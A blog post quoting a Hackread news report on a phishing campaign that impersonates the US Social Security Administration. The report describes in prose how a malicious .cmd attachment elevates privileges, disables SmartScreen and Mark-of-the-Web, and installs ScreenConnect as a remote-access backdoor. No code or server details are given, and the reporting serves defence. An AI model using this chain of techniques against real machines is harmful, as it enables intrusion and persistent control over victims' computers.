From Hackread:
A new wave of cyberattacks is stalking organisations across the UK, US, Canada, and Northern Ireland. According to the latest research from Forcepoint X-labs, attackers are impersonating the US Social Security Administration (SSA) to bypass security and take total control of private computers. ...
It starts with an email that looks official but is riddled with red flags, like the fake domain SSA.COM and the misspelling of Statement as “eStatemet.” If a user falls for the bait and opens the attached .cmd script, the computer quietly begins to sabotage its own defences. The X-labs team’s report noted that the script’s first job is to check for administrator powers using a technique called PowerShell auto-elevation. Once it has control, it kills Windows SmartScreen (the system that usually blocks suspicious apps from running) by modifying the computer’s registry. It also strips away the Mark-of-the-Web, a hidden digital tag Windows uses to identify files from the internet. ...
Once the guards are down, the script performs a silent installation of ConnectWise ScreenConnect. In a normal office, this is a legitimate tool for IT support. However, here, hackers are weaponising it as a Remote Access Trojan (RAT) to maintain a permanent “backdoor” into the network. Researchers noted that the software is hardcoded via a System.config file to call back to a specific server: ...
No comments:
Post a Comment